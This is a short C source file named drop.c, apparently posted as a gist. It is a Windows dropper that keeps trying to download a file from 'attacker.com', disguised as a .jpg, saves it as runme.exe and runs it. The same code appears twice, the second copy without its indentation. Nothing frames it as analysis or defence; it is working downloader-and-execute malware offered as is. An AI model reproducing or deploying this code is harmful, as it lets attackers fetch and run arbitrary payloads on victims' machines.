phikshun/drop.c

## drop.c
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <urlmon.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) {
	const char szFilename[] = "runme.exe";
	const char szDownloadUrl[] = "http://attacker.com/file.jpg";

	while(1) {
		if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) {
			STARTUPINFO si;
			PROCESS_INFORMATION pi;

			memset(&si, 0, sizeof(si));
			memset(&pi, 0, sizeof(pi));
			si.cb = sizeof(si);

			if (CreateProcess(szFilename, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
				CloseHandle(pi.hProcess);
				CloseHandle(pi.hThread);
			}

			break;
		} else {
			Sleep(5000);
		}
	}
	return 0;
}
	#define WIN32_LEAN_AND_MEAN
	#include <windows.h>
	#include <urlmon.h>

	int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) {
	const char szFilename[] = "runme.exe";
	const char szDownloadUrl[] = "http://attacker.com/file.jpg";

	while(1) {
	if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) {
	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	memset(&si, 0, sizeof(si));
	memset(&pi, 0, sizeof(pi));
	si.cb = sizeof(si);

	if (CreateProcess(szFilename, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	}

	break;
	} else {
	Sleep(5000);
	}
	}
	return 0;
	}